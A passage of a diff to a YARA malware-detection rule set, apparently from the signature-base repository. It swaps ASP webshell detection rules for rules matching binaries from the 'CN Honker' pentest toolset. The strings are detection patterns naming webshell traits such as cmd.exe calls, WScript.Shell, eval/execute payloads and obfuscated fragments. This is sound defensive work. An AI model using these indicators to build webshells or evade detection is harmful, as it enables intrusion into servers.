-		$asp_string43 = "if ((Request.Headers[headerNameKey] != null) && (Request.Headers[headerNameKey].Trim() == headerValueKey.Trim()))" wide ascii
-		$asp_string44 = "if (request.getHeader(headerNameKey).toString().trim().equals(headerValueKey.trim()))" wide ascii
-		$asp_string45 = "Response.Write(Server.HtmlEncode(ExcutemeuCmd(txtArg.Text)));" wide ascii
-		$asp_string46 = "\"c\" + \"m\" + \"d\"" wide ascii
-		$asp_string47 = "\".\"+\"e\"+\"x\"+\"e\"" wide ascii
-		$asp_string48 = "Tas9er" fullword wide ascii
-		$asp_string49 = "<%@ Page Language=\"\\u" wide ascii
-		$asp_string50 = "BinaryRead(\\u" wide ascii
-		$asp_string51 = "Request.\\u" wide ascii
-		$asp_string52 = "System.Buffer.\\u" wide ascii
-		$asp_string53 = "System.Net.\\u" wide ascii
-		$asp_string54 = ".\\u0052\\u0065\\u0066\\u006c\\u0065\\u0063\\u0074\\u0069\\u006f\\u006e\"" wide ascii
-		$asp_string55 = "\\u0041\\u0073\\u0073\\u0065\\u006d\\u0062\\u006c\\u0079.\\u004c\\u006f\\u0061\\u0064" wide ascii
-		$asp_string56 = "\\U00000052\\U00000065\\U00000071\\U00000075\\U00000065\\U00000073\\U00000074[\"" wide ascii
-		$asp_string57 = "*/\\U0000" wide ascii
-		$asp_string58 = "\\U0000FFFA" wide ascii
-		$asp_string59 = "\"e45e329feb5d925b\"" wide ascii
-		$asp_string60 = ">POWER!shelled<" wide ascii
-		$asp_string61 = "@requires xhEditor" wide ascii
-		$tagasp_short1 = /<%[^"]/ wide ascii
-		$tagasp_short2 = "%>" wide ascii
-		$tagasp_classid1 = "72C24DD5-D70A-438B-8A42-98424B88AFB8" nocase wide ascii
-		$tagasp_classid2 = "F935DC22-1CF0-11D0-ADB9-00C04FD58A0B" nocase wide ascii
-		$tagasp_classid3 = "093FF999-1EA0-4079-9525-9614C3504B74" nocase wide ascii
-		$tagasp_classid4 = "F935DC26-1CF0-11D0-ADB9-00C04FD58A0B" nocase wide ascii
-		$tagasp_classid5 = "0D43FE01-F093-11CF-8940-00A0C9054228" nocase wide ascii
-		$tagasp_long10 = "<%@ " wide ascii
-		$tagasp_long11 = /<% \w/ nocase wide ascii
-		$tagasp_long12 = "<%ex" nocase wide ascii
-		$tagasp_long13 = "<%ev" nocase wide ascii
-		$tagasp_long20 = /<(%|script|msxsl:script).{0,60}language="?(vb|jscript|c#)/ nocase wide ascii
-		$tagasp_long32 = /<script\s{1,30}runat=/ wide ascii
-		$tagasp_long33 = /<SCRIPT\s{1,30}RUNAT=/ wide ascii
-		$php1 = "<?php"
-		$php2 = "<?="
-		$jsp1 = "=\"java." wide ascii
-		$jsp2 = "=\"javax." wide ascii
-		$jsp3 = "java.lang." wide ascii
-		$jsp4 = "public" fullword wide ascii
-		$jsp5 = "throws" fullword wide ascii
-		$jsp6 = "getValue" fullword wide ascii
-		$jsp7 = "getBytes" fullword wide ascii
-		$perl1 = "PerlScript" fullword
+		$s1 = "Usage:%s username password" fullword ascii
+		$s2 = "<www.darkst.com>" fullword ascii
+
+	condition:
+		uint16( 0 ) == 0x5a4d and filesize < 17KB and all of them
+}
+rule SIGNATURE_BASE_CN_Honker_Oracle_V1_0_Oracle : FILE
+{
+	meta:
+		description = "Sample from CN Honker Pentest Toolset - file Oracle.exe"
+		author = "Florian Roth (Nextron Systems)"
+		id = "0cebede9-f4ff-5efb-98bc-55df0ad656a3"
+		date = "2015-06-23"
+		modified = "2023-12-05"
+		reference = "Disclosed CN Honker Pentest Toolset"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/cn_pentestset_tools.yar#L273-L289"
+		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
+		hash = "0264f4efdba09eaf1e681220ba96de8498ab3580"
+		logic_hash = "6f1bb6b14445a9ca29768ab2dcf831a98cb5d153d03ebc4bc497bb8f8144a365"
+		score = 70
+		quality = 85
+		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+
+	strings:
+		$s1 = "!http://localhost/index.asp?id=zhr" fullword ascii
+		$s2 = "OnGetPassword" fullword ascii
+		$s3 = "Mozilla/3.0 (compatible; Indy Library)" fullword ascii
 
 	condition:
-		filesize < 200KB and ( ( any of ( $tagasp_long* ) or any of ( $tagasp_classid* ) or ( $tagasp_short1 and $tagasp_short2 in ( filesize -100 .. filesize ) ) or ( $tagasp_short2 and ( $tagasp_short1 in ( 0 .. 1000 ) or $tagasp_short1 in ( filesize -1000 .. filesize ) ) ) ) and not ( ( any of ( $perl* ) or $php1 at 0 or $php2 at 0 ) or ( ( #jsp1 + #jsp2 + #jsp3 ) > 0 and ( #jsp4 + #jsp5 + #jsp6 + #jsp7 ) > 0 ) ) ) and any of ( $asp_string* )
+		uint16( 0 ) == 0x5a4d and filesize < 3455KB and all of them
 }
-rule SIGNATURE_BASE_WEBSHELL_ASP_Sniffer : FILE
+rule SIGNATURE_BASE_CN_Honker_Interception : FILE
 {
 	meta:
-		description = "ASP webshell which can sniff local traffic"
-		author = "Arnim Rupp (https://github.com/ruppde)"
-		id = "b5704c19-fce1-5210-8185-4839c1c5a344"
-		date = "2021-03-14"
-		modified = "2023-07-05"
-		reference = "Internal Research"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_webshells.yar#L4069-L4204"
+		description = "Sample from CN Honker Pentest Toolset - file Interception.exe"
+		author = "Florian Roth (Nextron Systems)"
+		id = "40d350e5-c6af-58e2-a1d8-f9516af5f869"
+		date = "2015-06-23"
+		modified = "2023-12-05"
+		reference = "Disclosed CN Honker Pentest Toolset"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/cn_pentestset_tools.yar#L291-L306"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "1206c22de8d51055a5e3841b4542fb13aa0f97dd"
-		hash = "60d131af1ed23810dbc78f85ee32ffd863f8f0f4"
-		hash = "c3bc4ab8076ef184c526eb7f16e08d41b4cec97e"
-		hash = "ed5938c04f61795834751d44a383f8ca0ceac833"
-		logic_hash = "874ec4c5dff024a899976e46cd553b52c361779a5507cf08ff0de596fd460d41"
-		score = 75
-		quality = -49
+		hash = "ea813aed322e210ea6ae42b73b1250408bf40e7a"
+		logic_hash = "d1ae5f8ff21659b95f6e62b1d5e3ec15b122a2b5889e8984f3d9f6d2fa938d17"
+		score = 70
+		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		importance = 70
 
 	strings:
-		$sniff1 = "Socket(" wide ascii
-		$sniff2 = ".Bind(" wide ascii
-		$sniff3 = ".SetSocketOption(" wide ascii
-		$sniff4 = ".IOControl(" wide ascii
-		$sniff5 = "PacketCaptureWriter" fullword wide ascii
-		$tagasp_short1 = /<%[^"]/ wide ascii
-		$tagasp_short2 = "%>" wide ascii
-		$tagasp_classid1 = "72C24DD5-D70A-438B-8A42-98424B88AFB8" nocase wide ascii
-		$tagasp_classid2 = "F935DC22-1CF0-11D0-ADB9-00C04FD58A0B" nocase wide ascii
-		$tagasp_classid3 = "093FF999-1EA0-4079-9525-9614C3504B74" nocase wide ascii
-		$tagasp_classid4 = "F935DC26-1CF0-11D0-ADB9-00C04FD58A0B" nocase wide ascii
-		$tagasp_classid5 = "0D43FE01-F093-11CF-8940-00A0C9054228" nocase wide ascii
-		$tagasp_long10 = "<%@ " wide ascii
-		$tagasp_long11 = /<% \w/ nocase wide ascii
-		$tagasp_long12 = "<%ex" nocase wide ascii
-		$tagasp_long13 = "<%ev" nocase wide ascii
-		$tagasp_long20 = /<(%|script|msxsl:script).{0,60}language="?(vb|jscript|c#)/ nocase wide ascii
-		$tagasp_long32 = /<script\s{1,30}runat=/ wide ascii
-		$tagasp_long33 = /<SCRIPT\s{1,30}RUNAT=/ wide ascii
-		$php1 = "<?php"
-		$php2 = "<?="
-		$jsp1 = "=\"java." wide ascii
-		$jsp2 = "=\"javax." wide ascii
-		$jsp3 = "java.lang." wide ascii
-		$jsp4 = "public" fullword wide ascii
-		$jsp5 = "throws" fullword wide ascii
-		$jsp6 = "getValue" fullword wide ascii
-		$jsp7 = "getBytes" fullword wide ascii
-		$perl1 = "PerlScript" fullword
-		$asp_input1 = "request" fullword nocase wide ascii
-		$asp_input2 = "Page_Load" fullword nocase wide ascii
-		$asp_input3 = "UmVxdWVzdC5Gb3JtK" fullword wide ascii
-		$asp_xml_http = "Microsoft.XMLHTTP" fullword nocase wide ascii
-		$asp_xml_method1 = "GET" fullword wide ascii
-		$asp_xml_method2 = "POST" fullword wide ascii
-		$asp_xml_method3 = "HEAD" fullword wide ascii
-		$asp_form1 = "<form " wide ascii
-		$asp_form2 = "<Form " wide ascii
-		$asp_form3 = "<FORM " wide ascii
-		$asp_asp = "<asp:" wide ascii
-		$asp_text1 = ".text" wide ascii
-		$asp_text2 = ".Text" wide ascii
+		$s2 = ".\\dat\\Hookmsgina.dll" fullword ascii
+		$s5 = "WinlogonHackEx " fullword wide
 
 	condition:
-		(( any of ( $tagasp_long* ) or any of ( $tagasp_classid* ) or ( $tagasp_short1 and $tagasp_short2 in ( filesize -100 .. filesize ) ) or ( $tagasp_short2 and ( $tagasp_short1 in ( 0 .. 1000 ) or $tagasp_short1 in ( filesize -1000 .. filesize ) ) ) ) and not ( ( any of ( $perl* ) or $php1 at 0 or $php2 at 0 ) or ( ( #jsp1 + #jsp2 + #jsp3 ) > 0 and ( #jsp4 + #jsp5 + #jsp6 + #jsp7 ) > 0 ) ) ) and ( any of ( $asp_input* ) or ( $asp_xml_http and any of ( $asp_xml_method* ) ) or ( any of ( $asp_form* ) and any of ( $asp_text* ) and $asp_asp ) ) and filesize < 30KB and all of ( $sniff* )
+		uint16( 0 ) == 0x5a4d and filesize < 160KB and all of them
 }
-rule SIGNATURE_BASE_WEBSHELL_ASP_Generic_Tiny : FILE
+rule SIGNATURE_BASE_CN_Honker_Sig_3389_Dubrute_V3_0_RC3_3_0 : FILE
 {
 	meta:
-		description = "Generic tiny ASP webshell which uses any eval/exec function indirectly on user input or writes a file"
-		author = "Arnim Rupp (https://github.com/ruppde)"
-		id = "0904cefb-6e0f-5e5f-9986-cf83d409ce46"
-		date = "2021-01-07"
-		modified = "2025-08-18"
-		reference = "Internal Research"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_webshells.yar#L4206-L4415"
+		description = "Sample from CN Honker Pentest Toolset - file 3.0.exe"
+		author = "Florian Roth (Nextron Systems)"
+		id = "994ad7e9-2019-54b3-84e6-2762a700c939"
+		date = "2015-06-23"
+		modified = "2023-12-05"
+		reference = "Disclosed CN Honker Pentest Toolset"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/cn_pentestset_tools.yar#L308-L324"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "990e3f129b8ba409a819705276f8fa845b95dad0"
-		hash = "52ce724580e533da983856c4ebe634336f5fd13a"
-		hash = "0864f040a37c3e1cef0213df273870ed6a61e4bc"
-		hash = "b184dc97b19485f734e3057e67007a16d47b2a62"
-		logic_hash = "e1b4e9fa88bb4260a83a22ec73c9fbec4d4f4928965cba9dfdd6fdba1307e8e4"
-		score = 75
-		quality = -127
+		hash = "49b311add0940cf183e3c7f3a41ea6e516bf8992"
+		logic_hash = "6d2f6721c942332af1be0b6537e9b9d0b5b3e91eb3912dcd095aa18bccfc4ad5"
+		score = 70
+		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		importance = 70
 
 	strings:
-		$fp1 = "net.rim.application.ipproxyservice.AdminCommand.execute"
-		$tagasp_short1 = /<%[^"]/ wide ascii
-		$tagasp_short2 = "%>" wide ascii
-		$tagasp_classid1 = "72C24DD5-D70A-438B-8A42-98424B88AFB8" nocase wide ascii
-		$tagasp_classid2 = "F935DC22-1CF0-11D0-ADB9-00C04FD58A0B" nocase wide ascii
-		$tagasp_classid3 = "093FF999-1EA0-4079-9525-9614C3504B74" nocase wide ascii
-		$tagasp_classid4 = "F935DC26-1CF0-11D0-ADB9-00C04FD58A0B" nocase wide ascii
-		$tagasp_classid5 = "0D43FE01-F093-11CF-8940-00A0C9054228" nocase wide ascii
-		$tagasp_long10 = "<%@ " wide ascii
-		$tagasp_long11 = /<% \w/ nocase wide ascii
-		$tagasp_long12 = "<%ex" nocase wide ascii
-		$tagasp_long13 = "<%ev" nocase wide ascii
-		$tagasp_long20 = /<(%|script|msxsl:script).{0,60}language="?(vb|jscript|c#)/ nocase wide ascii
-		$tagasp_long32 = /<script\s{1,30}runat=/ wide ascii
-		$tagasp_long33 = /<SCRIPT\s{1,30}RUNAT=/ wide ascii
-		$php1 = "<?php"
-		$php2 = "<?="
-		$jsp1 = "=\"java." wide ascii
-		$jsp2 = "=\"javax." wide ascii
-		$jsp3 = "java.lang." wide ascii
-		$jsp4 = "public" fullword wide ascii
-		$jsp5 = "throws" fullword wide ascii
-		$jsp6 = "getValue" fullword wide ascii
-		$jsp7 = "getBytes" fullword wide ascii
-		$perl1 = "PerlScript" fullword
-		$asp_input1 = "request" fullword nocase wide ascii
-		$asp_input2 = "Page_Load" fullword nocase wide ascii
-		$asp_input3 = "UmVxdWVzdC5Gb3JtK" fullword wide ascii
-		$asp_xml_http = "Microsoft.XMLHTTP" fullword nocase wide ascii
-		$asp_xml_method1 = "GET" fullword wide ascii
-		$asp_xml_method2 = "POST" fullword wide ascii
-		$asp_xml_method3 = "HEAD" fullword wide ascii
-		$asp_form1 = "<form " wide ascii
-		$asp_form2 = "<Form " wide ascii
-		$asp_form3 = "<FORM " wide ascii
-		$asp_asp = "<asp:" wide ascii
-		$asp_text1 = ".text" wide ascii
-		$asp_text2 = ".Text" wide ascii
-		$dex1 = "dex\n0"
-		$dex2 = "dey\n0"
-		$pack = { 50 41 43 4b 00 00 00 02 00 }
-		$asp_payload0 = "eval_r" fullword nocase wide ascii
-		$asp_payload1 = /\beval\s/ nocase wide ascii
-		$asp_payload2 = /\beval\(/ nocase wide ascii
-		$asp_payload3 = /\beval\"\"/ nocase wide ascii
-		$asp_payload4 = /:\s{0,10}eval\b/ nocase wide ascii
-		$asp_payload8 = /\bexecute\s?\(/ nocase wide ascii
-		$asp_payload9 = /\bexecute\s[\w"]/ nocase wide ascii
-		$asp_payload11 = "WSCRIPT.SHELL" fullword nocase wide ascii
-		$asp_payload13 = "ExecuteGlobal" fullword nocase wide ascii
-		$asp_payload14 = "ExecuteStatement" fullword nocase wide ascii
-		$asp_payload15 = "ExecuteStatement" fullword nocase wide ascii
-		$asp_multi_payload_one1 = "CreateObject" nocase fullword wide ascii
-		$asp_multi_payload_one2 = "addcode" fullword wide ascii
-		$asp_multi_payload_one3 = /\.run\b/ wide ascii
-		$asp_multi_payload_two1 = "CreateInstanceFromVirtualPath" fullword wide ascii
-		$asp_multi_payload_two2 = "ProcessRequest" fullword wide ascii
-		$asp_multi_payload_two3 = "BuildManager" fullword wide ascii
-		$asp_multi_payload_three1 = "System.Diagnostics" wide ascii
-		$asp_multi_payload_three2 = "Process" fullword wide ascii
-		$asp_multi_payload_three3 = ".Start" wide ascii
-		$asp_multi_payload_four1 = "CreateObject" fullword nocase wide ascii
-		$asp_multi_payload_four2 = "TransformNode" fullword nocase wide ascii
-		$asp_multi_payload_four3 = "loadxml" fullword nocase wide ascii
-		$asp_multi_payload_five1 = "ProcessStartInfo" fullword nocase wide ascii
-		$asp_multi_payload_five2 = ".Start" nocase wide ascii
-		$asp_multi_payload_five3 = ".Filename" nocase wide ascii
-		$asp_multi_payload_five4 = ".Arguments" nocase wide ascii
-		$asp_always_write1 = /\.write/ nocase wide ascii
-		$asp_always_write2 = /\.swrite/ nocase wide ascii
-		$asp_write_way_one2 = "SaveToFile" fullword nocase wide ascii
-		$asp_write_way_one3 = "CREAtEtExtFiLE" fullword nocase wide ascii
-		$asp_cr_write1 = "CreateObject(" nocase wide ascii
-		$asp_cr_write2 = "CreateObject (" nocase wide ascii
-		$asp_streamwriter1 = "streamwriter" fullword nocase wide ascii
-		$asp_streamwriter2 = "filestream" fullword nocase wide ascii
+		$s0 = "explorer.exe http://bbs.yesmybi.net" fullword ascii
+		$s1 = "LOADER ERROR" fullword ascii
+		$s9 = "CryptGenRandom" fullword ascii
 
 	condition:
-		(( any of ( $tagasp_long* ) or any of ( $tagasp_classid* ) or ( $tagasp_short1 and $tagasp_short2 in ( filesize -100 .. filesize ) ) or ( $tagasp_short2 and ( $tagasp_short1 in ( 0 .. 1000 ) or $tagasp_short1 in ( filesize -1000 .. filesize ) ) ) ) and not ( ( any of ( $perl* ) or $php1 at 0 or $php2 at 0 ) or ( ( #jsp1 + #jsp2 + #jsp3 ) > 0 and ( #jsp4 + #jsp5 + #jsp6 + #jsp7 ) > 0 ) ) ) and ( any of ( $asp_input* ) or ( $asp_xml_http and any of ( $asp_xml_method* ) ) or ( any of ( $asp_form* ) and any of ( $asp_text* ) and $asp_asp ) ) and not 1 of ( $fp* ) and not ( uint16( 0 ) == 0x5a4d or $dex1 at 0 or $dex2 at 0 or $pack at 0 or uint16( 0 ) == 0x4b50 ) and ( filesize < 700 and ( ( any of ( $asp_payload* ) or all of ( $asp_multi_payload_one* ) or all of ( $asp_multi_payload_two* ) or all of ( $asp_multi_payload_three* ) or all of ( $asp_multi_payload_four* ) or all of ( $asp_multi_payload_five* ) ) or ( any of ( $asp_always_write* ) and ( any of ( $asp_write_way_one* ) and any of ( $asp_cr_write* ) ) or ( any of ( $asp_streamwriter* ) ) ) ) )
+		uint16( 0 ) == 0x5a4d and filesize < 395KB and all of them
 }
-rule SIGNATURE_BASE_WEBSHELL_ASP_Generic : FILE
+rule SIGNATURE_BASE_CN_Honker_Windows_Exp : FILE
 {
 	meta:
-		description = "Generic ASP webshell which uses any eval/exec function indirectly on user input or writes a file"
-		author = "Arnim Rupp (https://github.com/ruppde)"
-		id = "0904cefb-6e0f-5e5f-9986-cf83d409ce46"
-		date = "2021-03-07"
-		modified = "2025-08-18"
-		reference = "Internal Research"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_webshells.yar#L4417-L4718"
+		description = "Sample from CN Honker Pentest Toolset - file exp.exe"
+		author = "Florian Roth (Nextron Systems)"
+		id = "148900d0-cf62-5cb0-adbc-52fa8ce8832e"
+		date = "2015-06-23"
+		modified = "2023-12-05"
+		reference = "Disclosed CN Honker Pentest Toolset"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/cn_pentestset_tools.yar#L326-L341"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "a8c63c418609c1c291b3e731ca85ded4b3e0fba83f3489c21a3199173b176a75"
-		hash = "4cf6fbad0411b7d33e38075f5e00d4c8ae9ce2f6f53967729974d004a183b25c"
-		hash = "a91320483df0178eb3cafea830c1bd94585fc896"
-		hash = "f3398832f697e3db91c3da71a8e775ebf66c7e73"
-		logic_hash = "c1807922c71cb591ce63ea2d4531d85c5b45ad0f03db07381f8160aec18264ed"
-		score = 60
-		quality = -151
+		hash = "04334c396b165db6e18e9b76094991d681e6c993"
+		logic_hash = "6a146545fd12e7603bf1e2ccb9b2d308b13fe2acdb9248a79c80b6c1de37fd73"
+		score = 70
+		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		importance = 70
 
 	strings:
-		$asp_much_sus7 = "Web Shell" nocase
-		$asp_much_sus8 = "WebShell" nocase
-		$asp_much_sus3 = "hidded shell"
-		$asp_much_sus4 = "WScript.Shell.1" nocase
-		$asp_much_sus5 = "AspExec"
-		$asp_much_sus14 = "\\pcAnywhere\\" nocase
-		$asp_much_sus15 = "antivirus" nocase
-		$asp_much_sus16 = "McAfee" nocase
-		$asp_much_sus17 = "nishang"
-		$asp_much_sus18 = "\"unsafe" fullword wide ascii
-		$asp_much_sus19 = "'unsafe" fullword wide ascii
-		$asp_much_sus28 = "exploit" fullword wide ascii
-		$asp_much_sus30 = "TVqQAAMAAA" wide ascii
-		$asp_much_sus31 = "HACKED" fullword wide ascii
-		$asp_much_sus32 = "hacked" fullword wide ascii
-		$asp_much_sus33 = "hacker" wide ascii
-		$asp_much_sus34 = "grayhat" nocase wide ascii
-		$asp_much_sus35 = "Microsoft FrontPage" wide ascii
-		$asp_much_sus36 = "Rootkit" wide ascii
-		$asp_much_sus37 = "rootkit" wide ascii
-		$asp_much_sus38 = "/*-/*-*/" wide ascii
-		$asp_much_sus39 = "u\"+\"n\"+\"s" wide ascii
-		$asp_much_sus40 = "\"e\"+\"v" wide ascii
-		$asp_much_sus41 = "a\"+\"l\"" wide ascii
-		$asp_much_sus42 = "\"+\"(\"+\"" wide ascii
-		$asp_much_sus43 = "q\"+\"u\"" wide ascii
-		$asp_much_sus44 = "\"u\"+\"e" wide ascii
-		$asp_much_sus45 = "/*//*/" wide ascii
-		$asp_much_sus46 = "(\"/*/\"" wide ascii
-		$asp_much_sus47 = "eval(eval(" wide ascii
-		$asp_much_sus48 = "Shell.Users" wide ascii
-		$asp_much_sus49 = "PasswordType=Regular" wide ascii
-		$asp_much_sus50 = "-Expire=0" wide ascii
-		$asp_much_sus51 = "sh\"&\"el" wide ascii
-		$asp_gen_sus1 = /:\s{0,20}eval}/ nocase wide ascii
-		$asp_gen_sus2 = /\.replace\(\/\w\/g/ nocase wide ascii
-		$asp_gen_sus6 = "self.delete"
-		$asp_gen_sus9 = "\"cmd /c" nocase
-		$asp_gen_sus10 = "\"cmd\"" nocase
-		$asp_gen_sus11 = "\"cmd.exe" nocase
-		$asp_gen_sus12 = "%comspec%" wide ascii
-		$asp_gen_sus13 = "%COMSPEC%" wide ascii
-		$asp_gen_sus18 = "Hklm.GetValueNames();" nocase
-		$asp_gen_sus19 = "http://schemas.microsoft.com/exchange/" wide ascii
-		$asp_gen_sus21 = "\"upload\"" wide ascii
-		$asp_gen_sus22 = "\"Upload\"" wide ascii
-		$asp_gen_sus25 = "shell_" wide ascii
-		$asp_gen_sus29 = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789" fullword wide ascii
-		$asp_gen_sus30 = "abcdefghijklmnopqrstuvwxyz234567" fullword wide ascii
-		$asp_gen_sus31 = "serv-u" wide ascii
-		$asp_gen_sus32 = "Serv-u" wide ascii
-		$asp_gen_sus33 = "Army" fullword wide ascii
-		$asp_slightly_sus1 = "<pre>" wide ascii
-		$asp_slightly_sus2 = "<PRE>" wide ascii
-		$asp_gen_obf1 = "\"+\"" wide ascii
-		$fp1 = "DataBinder.Eval"
-		$fp2 = "B2BTools"
-		$fp3 = "<b>Failed to execute cache update. See the log file for more information" ascii
-		$fp4 = "Microsoft. All rights reserved."
-		$fp5 = "\"unsafe\"," ascii wide
-		$tagasp_short1 = /<%[^"]/ wide ascii
-		$tagasp_short2 = "%>" wide ascii
-		$tagasp_classid1 = "72C24DD5-D70A-438B-8A42-98424B88AFB8" nocase wide ascii
-		$tagasp_classid2 = "F935DC22-1CF0-11D0-ADB9-00C04FD58A0B" nocase wide ascii
-		$tagasp_classid3 = "093FF999-1EA0-4079-9525-9614C3504B74" nocase wide ascii
-		$tagasp_classid4 = "F935DC26-1CF0-11D0-ADB9-00C04FD58A0B" nocase wide ascii
-		$tagasp_classid5 = "0D43FE01-F093-11CF-8940-00A0C9054228" nocase wide ascii
-		$tagasp_long10 = "<%@ " wide ascii
-		$tagasp_long11 = /<% \w/ nocase wide ascii
-		$tagasp_long12 = "<%ex" nocase wide ascii
-		$tagasp_long13 = "<%ev" nocase wide ascii
-		$tagasp_long20 = /<(%|script|msxsl:script).{0,60}language="?(vb|jscript|c#)/ nocase wide ascii
-		$tagasp_long32 = /<script\s{1,30}runat=/ wide ascii
-		$tagasp_long33 = /<SCRIPT\s{1,30}RUNAT=/ wide ascii
-		$php1 = "<?php"
-		$php2 = "<?="
-		$jsp1 = "=\"java." wide ascii
-		$jsp2 = "=\"javax." wide ascii
-		$jsp3 = "java.lang." wide ascii
-		$jsp4 = "public" fullword wide ascii
-		$jsp5 = "throws" fullword wide ascii
-		$jsp6 = "getValue" fullword wide ascii
-		$jsp7 = "getBytes" fullword wide ascii
-		$perl1 = "PerlScript" fullword
-		$dex1 = "dex\n0"
-		$dex2 = "dey\n0"
-		$pack = { 50 41 43 4b 00 00 00 02 00 }
-		$asp_input1 = "request" fullword nocase wide ascii
-		$asp_input2 = "Page_Load" fullword nocase wide ascii
-		$asp_input3 = "UmVxdWVzdC5Gb3JtK" fullword wide ascii
-		$asp_xml_http = "Microsoft.XMLHTTP" fullword nocase wide ascii
-		$asp_xml_method1 = "GET" fullword wide ascii
-		$asp_xml_method2 = "POST" fullword wide ascii
-		$asp_xml_method3 = "HEAD" fullword wide ascii
-		$asp_form1 = "<form " wide ascii
-		$asp_form2 = "<Form " wide ascii
-		$asp_form3 = "<FORM " wide ascii
-		$asp_asp = "<asp:" wide ascii
-		$asp_text1 = ".text" wide ascii
-		$asp_text2 = ".Text" wide ascii
-		$asp_payload0 = "eval_r" fullword nocase wide ascii
-		$asp_payload1 = /\beval\s/ nocase wide ascii
-		$asp_payload2 = /\beval\(/ nocase wide ascii
-		$asp_payload3 = /\beval\"\"/ nocase wide ascii
-		$asp_payload4 = /:\s{0,10}eval\b/ nocase wide ascii
-		$asp_payload8 = /\bexecute\s?\(/ nocase wide ascii
-		$asp_payload9 = /\bexecute\s[\w"]/ nocase wide ascii
-		$asp_payload11 = "WSCRIPT.SHELL" fullword nocase wide ascii
-		$asp_payload13 = "ExecuteGlobal" fullword nocase wide ascii
-		$asp_payload14 = "ExecuteStatement" fullword nocase wide ascii
-		$asp_payload15 = "ExecuteStatement" fullword nocase wide ascii
-		$asp_multi_payload_one1 = "CreateObject" nocase fullword wide ascii
-		$asp_multi_payload_one2 = "addcode" fullword wide ascii
-		$asp_multi_payload_one3 = /\.run\b/ wide ascii
-		$asp_multi_payload_two1 = "CreateInstanceFromVirtualPath" fullword wide ascii
-		$asp_multi_payload_two2 = "ProcessRequest" fullword wide ascii
-		$asp_multi_payload_two3 = "BuildManager" fullword wide ascii
-		$asp_multi_payload_three1 = "System.Diagnostics" wide ascii
-		$asp_multi_payload_three2 = "Process" fullword wide ascii
-		$asp_multi_payload_three3 = "Start" fullword wide ascii
-		$asp_multi_payload_four1 = "CreateObject" fullword nocase wide ascii
-		$asp_multi_payload_four2 = "TransformNode" fullword nocase wide ascii
-		$asp_multi_payload_four3 = "loadxml" fullword nocase wide ascii
-		$asp_multi_payload_five1 = "ProcessStartInfo" fullword nocase wide ascii
-		$asp_multi_payload_five2 = ".Start" nocase wide ascii
-		$asp_multi_payload_five3 = ".Filename" nocase wide ascii
-		$asp_multi_payload_five4 = ".Arguments" nocase wide ascii
-		$asp_always_write1 = /\.write/ nocase wide ascii
-		$asp_always_write2 = /\.swrite/ nocase wide ascii
-		$asp_write_way_one2 = "SaveToFile" fullword nocase wide ascii
-		$asp_write_way_one3 = "CREAtEtExtFiLE" fullword nocase wide ascii
-		$asp_cr_write1 = "CreateObject(" nocase wide ascii
-		$asp_cr_write2 = "CreateObject (" nocase wide ascii
-		$asp_streamwriter1 = "streamwriter" fullword nocase wide ascii
-		$asp_streamwriter2 = "filestream" fullword nocase wide ascii
-		$tagasp_capa_classid1 = "72C24DD5-D70A-438B-8A42-98424B88AFB8" nocase wide ascii
-		$tagasp_capa_classid2 = "F935DC22-1CF0-11D0-ADB9-00C04FD58A0B" nocase wide ascii
-		$tagasp_capa_classid3 = "093FF999-1EA0-4079-9525-9614C3504B74" nocase wide ascii
-		$tagasp_capa_classid4 = "F935DC26-1CF0-11D0-ADB9-00C04FD58A0B" nocase wide ascii
-		$tagasp_capa_classid5 = "0D43FE01-F093-11CF-8940-00A0C9054228" nocase wide ascii
+		$s0 = "c:\\windows\\system32\\command.com /c " fullword ascii
+		$s8 = "OH,Sry.Too long command." fullword ascii
 
 	condition:
-		(( any of ( $tagasp_long* ) or any of ( $tagasp_classid* ) or ( $tagasp_short1 and $tagasp_short2 in ( filesize -100 .. filesize ) ) or ( $tagasp_short2 and ( $tagasp_short1 in ( 0 .. 1000 ) or $tagasp_short1 in ( filesize -1000 .. filesize ) ) ) ) and not ( ( any of ( $perl* ) or $php1 at 0 or $php2 at 0 ) or ( ( #jsp1 + #jsp2 + #jsp3 ) > 0 and ( #jsp4 + #jsp5 + #jsp6 + #jsp7 ) > 0 ) ) ) and not ( uint16( 0 ) == 0x5a4d or $dex1 at 0 or $dex2 at 0 or $pack at 0 or uint16( 0 ) == 0x4b50 ) and ( any of ( $asp_input* ) or ( $asp_xml_http and any of ( $asp_xml_method* ) ) or ( any of ( $asp_form* ) and any of ( $asp_text* ) and $asp_asp ) ) and ( any of ( $asp_payload* ) or all of ( $asp_multi_payload_one* ) or all of ( $asp_multi_payload_two* ) or all of ( $asp_multi_payload_three* ) or all of ( $asp_multi_payload_four* ) or all of ( $asp_multi_payload_five* ) ) and not any of ( $fp* ) and ( ( filesize < 3KB and ( 1 of ( $asp_slightly_sus* ) ) ) or ( filesize < 25KB and ( 1 of ( 